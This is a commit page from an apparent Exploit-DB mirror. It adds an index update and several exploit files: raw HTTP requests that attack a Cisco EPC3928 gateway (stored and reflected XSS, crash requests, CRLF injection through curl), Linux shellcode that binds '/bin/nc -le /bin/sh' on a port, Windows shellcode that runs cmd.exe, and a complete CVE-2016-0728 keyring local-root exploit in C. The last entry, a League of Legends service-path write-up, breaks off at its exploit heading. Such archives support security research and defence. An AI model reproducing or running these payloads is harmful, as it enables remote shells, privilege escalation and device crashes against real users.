bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-06-08

Browse source 
5 new exploits

Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)
Windows x86 WinExec(_cmd.exe__0) Shellcode
Linux x86 /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)
League of Legends Screensaver - Unquoted Service Path Privilege Escalation
League of Legends Screensaver - Insecure File Permissions Privilege Escalation
Cisco EPC 3928 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-06-08 05:05:38 +00:00
parent 62962d90b0
commit 858079a4fe
7 changed files with 748 additions and 153 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

7
files.csv
View file

@ -35511,7 +35511,7 @@ id,file,description,date,author,platform,type,port
39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root",2016-01-19,"Perception Point Team",linux,local,0
39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Perception Point Team",linux,local,0
39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
@ -36079,3 +36079,8 @@ id,file,description,date,author,platform,type,port
39897,platforms/asp/webapps/39897.txt,"Notilus Travel Solution Software 2012 R3 - SQL Injection",2016-06-06,"Alex Haynes",asp,webapps,80
39898,platforms/php/webapps/39898.txt,"rConfig 3.1.1 - Local File Inclusion",2016-06-06,"Gregory Pickett",php,webapps,80
39899,platforms/php/webapps/39899.txt,"Nagios XI 5.2.7 - Multiple Vulnerabilities",2016-06-06,Security-Assessment.com,php,webapps,80
39900,platforms/win32/shellcode/39900.c,"Windows x86 WinExec(_cmd.exe__0) Shellcode",2016-06-07,"Roziul Hasan Khan Shifat",win32,shellcode,0
39901,platforms/lin_x86/shellcode/39901.c,"Linux x86 /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)",2016-06-07,sajith,lin_x86,shellcode,0
39902,platforms/windows/local/39902.txt,"League of Legends Screensaver - Unquoted Service Path Privilege Escalation",2016-06-07,"Vincent Yiu",windows,local,0
39903,platforms/windows/local/39903.txt,"League of Legends Screensaver - Insecure File Permissions Privilege Escalation",2016-06-07,"Vincent Yiu",windows,local,0
39904,platforms/asp/webapps/39904.txt,"Cisco EPC 3928 - Multiple Vulnerabilities",2016-06-07,"Patryk Bogdan",asp,webapps,0

Can't render this file because it is too large.

296
platforms/asp/webapps/39904.txt Executable file
View file

@ -0,0 +1,296 @@
# Title: Cisco EPC 3928 Multiple Vulnerabilities
# Vendor: http://www.cisco.com/
# Vulnerable Version(s): Cisco Model EPC3928 DOCSIS 3.0 8x4 Wireless Residential Gateway
# CVE References: CVE-2015-6401 / CVE-2015-6402 / CVE-2016-1328 / CVE-2016-1336 / CVE-2016-1337
# Author: Patryk Bogdan from Secorda security team (http://secorda.com/)
========
Summary:
In recent security research, Secorda security team has found multiple vulnerabilities affecting Cisco EPC3928 Wireless Residential Gateway. Variants of this product can also be affected.
Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key.
Until Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network.
Vulnerabilities:
1) Unauthorized Command Execution
2) Gateway Stored XSS
3) Gateway Client List DoS
4) Gateway Reflective XSS
5) Gateway HTTP Corruption DoS
6) "Stored" HTTP Response Injection
7) Boot Information Disclosure
========
PoC:
- Unathorized Command Execution
#1 - Channel selection request:
POST /goform/ChannelsSelection HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/ChannelsSelection.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
SAHappyUpstreamChannel=3
#1 - Response:
HTTP/1.0 200 OK
Server: PS HTTP Server
Content-type: text/html
Connection: close
<html lang="en"><head><title>RELOAD</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script language="javascript" type="text/javascript" src="../active.js"></script><script language="javascript" type="text/javascript" src="../lang.js"></script><script language="javascript" type="text/javascript">var totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);</script></head><body BGCOLOR="#CCCCCC" TEXT=black><form name="formnow"><HR><h1><script language="javascript" type="text/javascript">dw(msg_goform34);</script><a href="http://192.168.1.1/index.asp"><script language="javascript" type="text/javascript">dw(msg_goform35);</script></a><script language="javascript">refreshStatus();</script><input type="text" name="hh" style="background-color:#CCCCCC;font-size:36;border:none"></h1></form></body></html>
#2 - Clear logs request:
POST /goform/Docsis_log HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_log.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
BtnClearLog=Clear+Log&SnmpClearEventLog=0
#2 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Docsis_log.asp
Content-type: text/html
Connection: close
- Gateway Stored and Reflective Cross Site Scripting
Example #1:
#1 Stored XSS via username change request:
POST /goform/Administration HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
working_mode=0&sysname=<script>alert('XSS')</script>&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common
#1 Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Administration.asp
Content-type: text/html
Connection: close
#2 Redirect request:
GET /Administration.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
DNT: 1
Connection: keep-alive
#2 Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 15832
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
<tr>
<td>
<script language="javascript" type="text/javascript">dw(usertype);</script>
</td>
<td nowrap>
<script>alert('XSS')</script>
</TD>
</tr>
<tr>
(...)
Example #2:
#1 Reflected XSS via client list request:
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y
#1 Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: 192.168.1.1/WClientMACList.asp
Content-type: text/html
Connection: close
#2 Redirect request:
GET /WClientMACList.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
#2 Reponse:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 7385
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
</table>
</div>
<input type="hidden" name="h_sortWireless" value="mac" onmouseover=alert(1) x="y" />
</form>
</body>
</html>
(...)
- Gateway Client List Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- Gateway HTTP Corruption Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_system.asp
Cookie: Lang=en; SessionID=348080
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
- "Stored" HTTP Response Injection
It is able to inject additional HTTP data to response, if string parameter of LanguageSelect won't be too long (in that case device will crash).
Additional data will be stored in device memory and returned with every http response on port 80 until reboot.
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 1469
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=en
Set-Cookie: w00t
Set-Cookie: SessionID=657670
Content-Length: 1469
- Boot Information Disclosure
In early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials.
Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo
========
CVE References:
CVE-2015-6401
CVE-2015-6402
CVE-2016-1328
CVE-2016-1336
CVE-2016-1337
Cisco Bug IDs:
CSCux24935
CSCux24938
CSCux24941
CSCux24948
CSCuy28100
CSCux17178
Read more on our blog:
http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/

53
platforms/lin_x86/shellcode/39901.c Executable file
View file

@ -0,0 +1,53 @@
/*
# Linux x86 /bin/nc -le /bin/sh -vp13337 shellcode(56bytes)
# Author: Author: sajith
# Tested on: i686 GNU/Linux
# Shellcode Length: 56
#SLAE - 750
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 50 push eax
8048063: 68 33 33 33 37 push 0x37333333
8048068: 68 2d 76 70 31 push 0x3170762d
804806d: 89 e6 mov esi,esp
804806f: 50 push eax
8048070: 68 2f 2f 73 68 push 0x68732f2f
8048075: 68 2f 62 69 6e push 0x6e69622f
804807a: 68 2d 6c 65 2f push 0x2f656c2d
804807f: 89 e7 mov edi,esp
8048081: 50 push eax
8048082: 68 2f 2f 6e 63 push 0x636e2f2f
8048087: 68 2f 62 69 6e push 0x6e69622f
804808c: 89 e3 mov ebx,esp
804808e: 50 push eax
804808f: 56 push esi
8048090: 57 push edi
8048091: 53 push ebx
8048092: 89 e1 mov ecx,esp
8048094: b0 0b mov al,0xb
8048096: cd 80 int 0x80
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x33\x33\x33\x37\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

295
platforms/linux/local/39277.c
View file

@ -6,11 +6,11 @@
*/
/* CVE-2016-0728 local root exploit
modified by Federico Bento to read kernel symbols from /proc/kallsyms
props to grsecurity/PaX for preventing this in so many ways
modified by Federico Bento to read kernel symbols from /proc/kallsyms
props to grsecurity/PaX for preventing this in so many ways
$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
$ ./cve_2016_072 PP_KEY */
$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
$ ./cve_2016_072 PP_KEY */
#include <stdio.h>
#include <stdlib.h>
@ -25,8 +25,7 @@
#include <sys/msg.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*
_prepare_kernel_cred)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
@ -37,183 +36,177 @@ _prepare_kernel_cred prepare_kernel_cred;
struct key_type {
char * name;
size_t datalen;
void * vet_description;
void * preparse;
void * free_preparse;
void * instantiate;
void * update;
void * match_preparse;
void * match_free;
void * revoke;
void * destroy;
char * name;
size_t datalen;
void * vet_description;
void * preparse;
void * free_preparse;
void * instantiate;
void * update;
void * match_preparse;
void * match_free;
void * revoke;
void * destroy;
};
/* thanks spender - Federico Bento */
static unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret;
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
fprintf(stdout, "Unable to obtain symbol listing!\n");
exit(0);
}
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
fprintf(stdout, "Unable to obtain symbol listing!\n");
exit(0);
}
ret = 0;
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr);
fclose(f);
return addr;
}
}
ret = 0;
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
fclose(f);
return 0;
}
void userspace_revoke(void * key) {
commit_creds(prepare_kernel_cred(0));
commit_creds(prepare_kernel_cred(0));
}
int main(int argc, const char *argv[]) {
const char *keyring_name;
size_t i = 0;
unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
struct key_type * my_key_type = NULL;
const char *keyring_name;
size_t i = 0;
unsigned long int l = 0x100000000/2;
key_serial_t serial = -1;
pid_t pid = -1;
struct key_type * my_key_type = NULL;
struct {
long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;
struct {
long mtype;
char mtext[STRUCT_LEN];
} msg = {0x4141414141414141, {0}};
int msqid;
if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
}
if (argc != 2) {
puts("usage: ./keys <key_name>");
return 1;
}
printf("[+] uid=%d, euid=%d\n", getuid(), geteuid());
commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
prepare_kernel_cred =
(_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
if(commit_creds == NULL || prepare_kernel_cred == NULL) {
commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;
prepare_kernel_cred =
(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;
if(commit_creds == (_commit_creds)0xffffffff810bb050
|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)
puts("[-] You probably need to change the address of
commit_creds and prepare_kernel_cred in source");
}
printf("[+] uid=%d, euid=%d\n", getuid(), geteuid());
commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
if(commit_creds == NULL || prepare_kernel_cred == NULL) {
commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;
prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;
if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)
puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source");
}
my_key_type = malloc(sizeof(*my_key_type));
my_key_type = malloc(sizeof(*my_key_type));
my_key_type->revoke = (void*)userspace_revoke;
memset(msg.mtext, 'A', sizeof(msg.mtext));
my_key_type->revoke = (void*)userspace_revoke;
memset(msg.mtext, 'A', sizeof(msg.mtext));
// key->uid
*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
//key->perm
*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
// key->uid
*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
//key->perm
*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
//key->type
*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
//key->type
*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
exit(1);
}
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("msgget");
exit(1);
}
keyring_name = argv[1];
keyring_name = argv[1];
/* Set the new session keyring before we start */
/* Set the new session keyring before we start */
serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
}
serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
if (serial < 0) {
perror("keyctl");
return -1;
}
if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL |
KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}
if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
perror("keyctl");
return -1;
}
puts("[+] Increfing...");
for (i = 1; i < 0xfffffffd; i++) {
if (i == (0xffffffff - l)) {
l = l/2;
sleep(5);
}
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
sleep(5);
/* here we are going to leak the last references to overflow */
for (i=0; i<5; ++i) {
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
puts("[+] Increfing...");
for (i = 1; i < 0xfffffffd; i++) {
if (i == (0xffffffff - l)) {
l = l/2;
sleep(5);
}
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
sleep(5);
/* here we are going to leak the last references to overflow */
for (i=0; i<5; ++i) {
if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
perror("[-] keyctl");
return -1;
}
}
puts("[+] Finished increfing");
puts("[+] Forking...");
/* allocate msg struct in the kernel rewriting the freed keyring
object */
for (i=0; i<64; i++) {
pid = fork();
if (pid == -1) {
perror("[-] fork");
return -1;
}
puts("[+] Finished increfing");
puts("[+] Forking...");
/* allocate msg struct in the kernel rewriting the freed keyring object */
for (i=0; i<64; i++) {
pid = fork();
if (pid == -1) {
perror("[-] fork");
return -1;
}
if (pid == 0) {
sleep(2);
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("[-] msgget");
exit(1);
}
for (i = 0; i < 64; i++) {
if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
perror("[-] msgsnd");
exit(1);
}
}
sleep(-1);
exit(1);
}
}
if (pid == 0) {
sleep(2);
if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
perror("[-] msgget");
exit(1);
}
for (i = 0; i < 64; i++) {
if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
perror("[-] msgsnd");
exit(1);
}
}
sleep(-1);
exit(1);
}
}
puts("[+] Finished forking");
sleep(5);
puts("[+] Finished forking");
sleep(5);
/* call userspace_revoke from kernel */
puts("[+] Caling revoke...");
if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
perror("[+] keyctl_revoke");
}
/* call userspace_revoke from kernel */
puts("[+] Caling revoke...");
if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
perror("[+] keyctl_revoke");
}
printf("uid=%d, euid=%d\n", getuid(), geteuid());
execl("/bin/sh", "/bin/sh", NULL);
printf("uid=%d, euid=%d\n", getuid(), geteuid());
execl("/bin/sh", "/bin/sh", NULL);
return 0;
return 0;
}

171
platforms/win32/shellcode/39900.c Executable file
View file

@ -0,0 +1,171 @@
/*
# Title : Windows x86 WinExec("cmd.exe",0) shellcode
# Date : 07/06/2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Windows 7 Professional x86
*/
/*
To Compile:
--------------
$nasm -f win32 winexec.asm -o exec.obj
Linking:
----------
$ "C:\Program Files\CodeBlocks\MinGW\bin\ld.exe" -o winexec.exe exec.obj
*/
/*
section .text
global _start
_start:
;Finding base address of kernel32.dll
xor ecx,ecx
mov eax,[fs:0x30] ;loading PEB(Process Environment Block) in Eax
mov eax,[eax+0xc] ;Eax=PEB->Ldr
mov esi,[eax+0x14] ;Eax=Peb->Ldr.InMemOrderModuleList
lodsd ;Eax=second module of InMemOrderModuleList (ntdll.dll)
xchg eax,esi ;Eax=Esi ,Esi=Eax
lodsd ;Eax=third module of InMemOrderModuleList (kernel32.dll)
mov ebx,[eax+0x10] ;Ebx=base Address of Kernel32.dll (PVOID Dllbase)
;-------------------------------------------------------------------------------------------------------
;Finding Export table of Kernel32.dll
mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew
add edx,ebx ;(DOS->e_lfanew+base address of kernel32.dll)=PE Header
mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress
add edx,ebx ; (DataDirectory->VirtualAddress+kernel32.dll base address)=Export table of kernel32.dll (IMAGE_EXPORT_DIRECTORY)
mov esi,[edx+0x20] ;(IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames
add esi,ebx ; ESI=(AddressOfNames+kernel32.dll base address)=kernel32.dll AddressOfNames
xor ecx,ecx
;--------------------------------------------------------------------------------------------------------------
;finding GetProcAddress function name
Get_func:
inc ecx ;Incrementing the Ordinal
lodsd ;Get name Offset
add eax,ebx ;(name offset+kernel32.dll base address)=Get Function name
cmp dword [eax],0x50746547 ;GetP
jnz Get_func
cmp dword [eax+0x4],0x41636f72 ; rocA
jnz Get_func
cmp dword [eax+0x8],0x65726464 ; ddre
jnz Get_func
;-----------------------------------------------------------------------------------------------------------
;finding the address of GetProcAddress
mov esi,[edx+0x24] ;Esi=(IMAGE_EXPORT_DIRECTORY+0x24)=AddressOfNameOrdinals
add esi,ebx ;(AddressOfNameOrdinals+base address of kernel32.dll)=AddressOfNameOrdinals of kernel32.dll
mov cx,[esi+ecx*2] ;CX=Number of Function
dec ecx
mov esi,[edx+0x1c] ;(IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions
add esi,ebx ;ESI=beginning of Address table
mov edx,[esi+ecx*4] ;EDX=Pointer(offset)
add edx,ebx ;Edx=Address of GetProcAddress
;-------------------------------------------------------------------------------------------------------
;backing up address of GetProcAddress because EAX,EBX,EDX,ECX Register value will be changed after calling function
xor esi,esi
push edx
pop esi
;----------------------------------------
;backing up kernel32.dll base address
xor edi,edi
push ebx
pop edi
;------------------------
;Finding address of Winexe()
xor ecx,ecx
push ecx
push 0x00636578
push 0x456e6957
mov ecx,esp
push ecx
push ebx
call edx
;-----------------------
;finding address of ExitProcess
xor ecx,ecx
push ecx
push 0x00737365
push 0x636f7250
push 0x74697845
mov ecx,esp
push ecx
push edi
xor edi,edi
mov edi,eax ;address of WinExec
call esi
;---------------
xor esi,esi
push eax
pop esi ;address of ExitProcess
;-------------------
;calling winexec
xor ecx,ecx
push ecx
push 0x00657865
push 0x2e646d63
mov ecx,esp
push 0
push ecx
call edi
;--------------
;exiting
push 0
call esi
*/
#include<stdio.h>
char shellcode[]=\
"\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x52\x5e\x31\xff\x53\x5f\x31\xc9\x51\x68\x78\x65\x63\x00\x68\x57\x69\x6e\x45\x89\xe1\x51\x53\xff\xd2\x31\xc9\x51\x68\x65\x73\x73\x00\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x89\xe1\x51\x57\x31\xff\x89\xc7\xff\xd6\x31\xf6\x50\x5e\x31\xc9\x51\x68\x65\x78\x65\x00\x68\x63\x6d\x64\x2e\x89\xe1\x6a\x00\x51\xff\xd7\x6a\x00\xff\xd6\xff\xff\xff\xff\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00";
main()
{
(* (int(*)()) shellcode)();
}

45
platforms/windows/local/39902.txt Executable file
View file

@ -0,0 +1,45 @@
# Exploit Title: League of Legends Screensaver Unquoted Service Paths
Conditional Privilege Escalation.
# CVE-ID: NA
# Date: 13/04/2016
# Exploit Author: Vincent Yiu
# Contact: vysec.private@gmail.com
# Vendor Homepage: http://www.leagueoflegends.com
# Software Link: screensaver.euw.leagueoflegends.com/en_US
# Version: MD5 Hash: 0C1B02079CA8BF850D59DD870BC09963
# Tested on: Windows 7 Professional x64 fully updated.
1. Description:
The League of Legends installer would install the League of Legends
screensaver along with a service. The service would be called
'lolscreensaver'. This particular service was misconfigured such that
the service binary path was unquoted. When the screensaver is
installed to 'C:\Riot Games', the issue is not exploitable. However,
during the installation process, users are able to specify a directory
to install to. When a user chooses to install this to say an external
drive, this becomes exploitable.
This was reported to Riot Games and has been rectified in the latest version.
2. Proof
http://i.imgur.com/S2fuUKa.png
3. Exploit:
